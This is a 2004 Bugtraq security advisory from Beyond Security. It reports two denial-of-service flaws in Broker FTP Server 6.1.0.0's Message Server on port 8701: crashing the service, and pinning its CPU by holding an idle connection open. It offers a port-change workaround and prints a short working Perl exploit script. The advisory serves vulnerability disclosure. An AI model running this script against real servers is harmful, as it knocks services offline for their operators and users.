[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200402171748.54476.aviram@beyondsecurity.com>
Date: Tue, 17 Feb 2004 17:48:54 +0200
From: Aviram Jenik <aviram@...ondsecurity.com>
To: bugtraq@...urityfocus.com
Subject: Broker FTP DoS (Message Server)
Broker FTP DoS (Message Server)
------------------------------------------------
Article reference:
http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html
SUMMARY
Beyond Security's SecurITeam has discovered two security vulnerabilities
in the Broker FTP product, these vulnerabilities allow a remote attacker
to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to
use large amount of CPU time.
DETAILS
Affected version:
* Broker FTP Server version 6.1.0.0
By connecting and immediately disconnecting to the Broker FTP server's
Message Server (by default residing on port 8701) it is possible to cause
an exception in the TsFtpSrv.exe program. The exception doesn't cause any
harm beside showing a message that the TsFtpSrv.exe has encountered an
Application Error.
By connecting and not sending anything (but keeping the connection open),
it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU
time (basically while the connection is kept open, CPU usage will be
100%).
Workaround:
It is not clear what the Message Server is used for, but modifying the
TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what
port the server listens on (and change it from the default one).
Exploit:
#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: pfdos.pl < host>
~;
exit;}
$ip=$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,8701,$target)){
select(S);
$|=1;
print $pstr;
sleep 100;
close(S);
} else { die("Can't connect...\n"); }
}
Vendor Status:
We have tried to contact the vendor over a month ago, but have not received
any response as of yet.
ADDITIONAL INFORMATION
The information has been provided by <mailto:expert@...uriteam.com>
SecurITeam.
--
Beyond Security Ltd.
"Know that you're safe"
http://www.BeyondSecurity.com
http://www.SecuriTeam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
Powered by blists - more mailing lists